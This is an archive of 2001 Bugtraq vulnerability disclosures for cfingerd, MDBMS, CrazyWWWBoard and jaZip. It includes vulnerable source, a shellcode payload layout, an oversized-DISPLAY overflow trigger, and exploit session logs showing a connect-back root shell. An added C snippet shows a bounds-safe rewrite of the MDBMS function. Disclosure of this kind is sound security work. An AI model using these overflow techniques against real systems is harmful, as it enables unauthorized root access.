Another exploit for cfingerd <= 1.4.3-8

2001-07-11 Thread teleh0r

Dear bugtraq readers,

This is another exploit for the flaw found by Steven Van Acker.
http://www.securityfocus.com/archive/1/192844

In order to allow for more nops, I have constructed the payload
like this:

[82 nops][jmp 0x4][retaddr][shellcode]

[teleh0r@localhost teleh0r]$ ./cfingerd-exploit.pl -s 1
Address: 0xb46c
Exploit attempt succeeded!
[teleh0r@localhost teleh0r]#

Tested against cfingerd 1.4.3-8.

Sincerely yours,
teleh0r
http://www.digit-labs.org/teleh0r/
Attachment: cfingerd-exploit.pl


Remote buffer overflow in MDBMS.

2001-06-13 Thread teleh0r


Dear bugtraq readers,
 
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below contain an exploitable
buffer overflow in the handling of the \s console command.
 
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the
overflow.
 
Below is faulty code (from interface.cc):
 
void user::uprintf(char *s, ...)
{
  char b[1];                      /* 1-byte stack buffer */
  int len=strlen(outbuf), newlen;
  va_list ap;
  va_start(ap,s);
  vsprintf(b,s,ap);               /* unbounded write into b[1]: the overflow */
  va_end(ap);
  newlen=strlen(b);
  /* outbuf is grown here, but b has already been overrun above */
  while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
  strcat(outbuf,b);
  FD_SET(fd,parent->wmask);
}
 
mu-b also found a buffer overflow in the create database
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
 
Information about the overflows was sent to [EMAIL PROTECTED]
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
 
We would like to thank Marty for his kind response and quick update.
 
Exploit example:

 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- [EMAIL PROTECTED] - Copyright (c) 2001
 
Usage: ./mdbms-pms.pl -t hostname -b back
 
 -t hostname: hostname to test
 -b back: connect back to ip
 -p port: port (default: 2223)
 -d delay   : delay before timeout
 -o offset  : offset
 -h   : return to heap
 
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 
[1] 2070
listening on [any] 1337 ...
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
 
-- Remote code execution exploit - MDBMS <= 0.99b
-- [EMAIL PROTECTED] - Copyright (c) 2001
 
- Connected to: 127.1 / MDBMS V0.99b9 ready.
- Address : 0x302027d / xor-mask: 0x2020202
- Return  : 0x80cfe76 / using the heap ...
- Sending payload: ...
 
- * Successfully sent payload - good luck!
 
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
 
Exploit code attached.
 
Sincerely yours,
teleh0r and mu-b

--
To avoid criticism, do nothing, say nothing, be nothing.
 -- Elbert Hubbard
Attachment: mdbms.tar.gz
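As an added example (not MDBMS's own code, and not the fix Marty shipped), here is how uprintf() can be written so that no fixed-size stack buffer is involved: the formatted length is measured first with vsnprintf(), the output buffer is grown to fit, and only then is the text formatted straight into it. The struct user and its outbuf/outsize fields are assumed stand-ins for the real object.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for the MDBMS user object (assumed layout). */
struct user {
    char  *outbuf;   /* accumulated output, NUL-terminated */
    size_t outsize;  /* bytes allocated for outbuf */
};
/* Hardened uprintf(): measure with vsnprintf() first, grow outbuf, then
 * format straight into it. No fixed-size stack buffer is involved.
 * Returns bytes appended, or -1 on formatting/allocation failure. */
int user_uprintf(struct user *u, const char *fmt, ...)
{
    va_list ap, ap2;
    va_start(ap, fmt);
    va_copy(ap2, ap);
    int need = vsnprintf(NULL, 0, fmt, ap);   /* length excluding NUL */
    va_end(ap);
    if (need < 0) { va_end(ap2); return -1; }
    size_t len  = u->outbuf ? strlen(u->outbuf) : 0;
    size_t want = len + (size_t)need + 1;     /* +1 for terminating NUL */
    if (want > u->outsize) {
        size_t newsize = u->outsize ? u->outsize : 1024;
        while (newsize < want) newsize *= 2;  /* grow geometrically */
        char *p = realloc(u->outbuf, newsize);
        if (!p) { va_end(ap2); return -1; }
        u->outbuf = p; u->outsize = newsize;
    }
    vsnprintf(u->outbuf + len, u->outsize - len, fmt, ap2);
    va_end(ap2);
    return need;
}

/* Mirrors the post's trigger: long lines appended one after the other.
 * Returns the final buffer length, or (size_t)-1 on error. */
size_t demo_accumulate(size_t lines, size_t line_len)
{
    struct user u = { NULL, 0 };
    char *line = malloc(line_len + 1);
    if (!line) return (size_t)-1;
    memset(line, 'A', line_len); line[line_len] = '\0';
    size_t total = 0;
    for (size_t i = 0; i < lines && total != (size_t)-1; i++)
        total = user_uprintf(&u, "%s\n", line) < 0 ? (size_t)-1 : strlen(u.outbuf);
    free(line); free(u.outbuf);
    return total;
}
```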


Remote buffer overflow in CrazyWWWBoard.

2001-03-31 Thread teleh0r

Dear Bugtraq,

"Just little bits of history repeating"

I have discovered a buffer overflow in CrazyWWWBoard Full Edition and
CrazyWWWBoard Limited Edition.

This is NOT the same overflow as discovered by Jin Ho You, 01.30.2001
(http://www.securityfocus.com/archive/1/159387)

This overflow will allow for arbitrary code execution with the privileges of
the web server. The versions which have been tested are:
CrazyWWWBoard2000p4 for RedHat 6.0 and CrazyWWWBoard2000LEp5 for
RedHat 6.1.

Proof of Concept exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
Attachment: crazywwwb-exploit.pl


Vulnerability in jaZip.

2001-01-15 Thread teleh0r

Dear Bugtraq,

jaZip is a program for managing an Iomega Zip or Jaz drive.
It is often installed setuid root - and because of a buffer
overflow it is possible for regular users to become root.

Please excuse me if this was known. Please note that I cannot
guarantee that this information is correct.

Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/
RPMS/jaZip-0.32-2.i386.rpm

  [root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
  [root@localhost /root]# gdb /usr/X11R6/bin/jazip
  GNU gdb 19991004
  Copyright 1998 Free Software Foundation, Inc.
  (gdb) r
  Starting program: /usr/X11R6/bin/jazip

  Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  
  [teleh0r@localhost teleh0r]$ rpm -q jaZip
  jaZip-0.32-2
  [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
  Address: 0xb7ac
  bash#

Exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
Attachment: jazip-exploit.pl